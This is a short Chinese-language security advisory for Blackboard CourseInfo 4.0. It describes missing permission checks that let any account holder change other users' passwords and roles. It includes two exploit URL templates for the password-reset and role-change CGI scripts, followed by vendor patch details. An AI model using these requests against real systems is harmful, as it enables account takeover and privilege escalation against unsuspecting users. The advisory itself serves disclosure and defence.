添加时间:
2005-08-11

系统编号:
WAVDB-00022

影响版本:
Blackboard CourseInfo 4.0

程序介绍:

Blackboard是一款在线提供学术、管理、社区及其他一些教育服务的解决方案。

漏洞分析:

Blackboard CourseInfo在执行更新数据库操作时缺乏完整的权限检查。任意用户只要有一个合法的Blackboard CourseInfo账号，就可以利用它的cgi程序修改其他用户的资料信息，包括口令及身份状态等等。

漏洞利用:

下列URL可以改变任意已知账号的口令：

http://target/bin/common/user_update_passwd.pl?user_id=<value>&firstname=<value>&lastname=<value>&course_id=<value>&password1=<value>&password2=<value>

下列URL可以改变用户身份状态，比如学生( S ),助教( T ),讲师( G )

http://target/bin/common/user_update_admin.pl?user_id=<value>&course_id=<value>&role=<value>&available_ind=Y

解决方案:
厂商补丁：
Blackboard
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Blackboard将在最近推出安全补丁来修补这个漏洞，用户可以联系供应商获得详细信息。
Blackboard产品支持热线：
1-888-788-5264
或者通过WEB站点提交服务请求：
http://company.blackboard.com/

信息来源:
<* 来源：Pedram Amini <amini@EECS.TULANE.EDU> *>